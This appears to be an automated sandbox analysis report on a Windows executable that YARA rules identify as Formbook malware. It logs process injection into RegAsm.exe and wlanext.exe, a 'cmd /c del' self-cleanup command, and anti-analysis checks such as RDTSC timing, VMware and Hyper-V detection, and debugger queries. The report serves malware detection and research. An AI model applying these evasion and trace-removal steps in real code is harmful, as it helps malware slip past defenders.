          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: NQQWym075C.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/0@15/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_01
          Source: NQQWym075C.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NQQWym075C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\NQQWym075C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\NQQWym075C.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\NQQWym075C.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: NQQWym075C.exeVirustotal: Detection: 30%
          Source: NQQWym075C.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\NQQWym075C.exeFile read: C:\Users\user\Desktop\NQQWym075C.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Users\user\Desktop\NQQWym075C.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: NQQWym075C.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: NQQWym075C.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.276281432.0000000002E50000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, wlanext.exe, 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: wlanext.exe, 00000006.00000002.489706103.0000000003C27000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, wlanext.exe, cscript.exe
          Source: Binary string: wlanext.pdb source: RegAsm.exe, 00000005.00000002.263382361.0000000002DC0000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb4 source: wlanext.exe, 00000006.00000002.489706103.0000000003C27000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.276281432.0000000002E50000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: RegAsm.exe, 00000005.00000002.263382361.0000000002DC0000.00000040.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417141 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B375 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B3C2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B3CB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419BB1 push cs; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406420 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B42C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419CAC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415D49 push 0000004Ah; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0306D0D1 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417141 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B375 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B3C2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B3CB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419BB1 push cs; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406420 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B42C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419CAC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00415D49 push 0000004Ah; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F4D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0376D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B375 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03259BB1 push cs; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B3C2 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B3CB push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03257141 pushfd ; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03255D49 push 0000004Ah; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03246420 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B42C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03259CAC push esp; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047ED0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85956112401
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000032485C4 second address: 00000000032485CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000324894E second address: 0000000003248954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000029685C4 second address: 00000000029685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000296894E second address: 0000000002968954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQQWym075C.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408880 rdtsc
          Source: C:\Users\user\Desktop\NQQWym075C.exeWindow / User API: threadDelayed 1771
          Source: C:\Users\user\Desktop\NQQWym075C.exeWindow / User API: threadDelayed 1364
          Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 5256Thread sleep time: -35420s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6332Thread sleep time: -55000s >= -30000s
          Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 1932Thread sleep count: 233 > 30
          Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 5520Thread sleep count: 1364 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4012Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.258002890.000000000F5C0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.251807109.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.500819308.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: wlanext.exe, 00000006.00000002.485879155.00000000034BE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.252038258.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000002.500867105.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.239692433.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408880 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03043B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03043B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03021B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03021B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03042397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03044BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03044BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03044BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03028A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03015210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03015210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03015210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03015210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03033A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03054A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03054A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
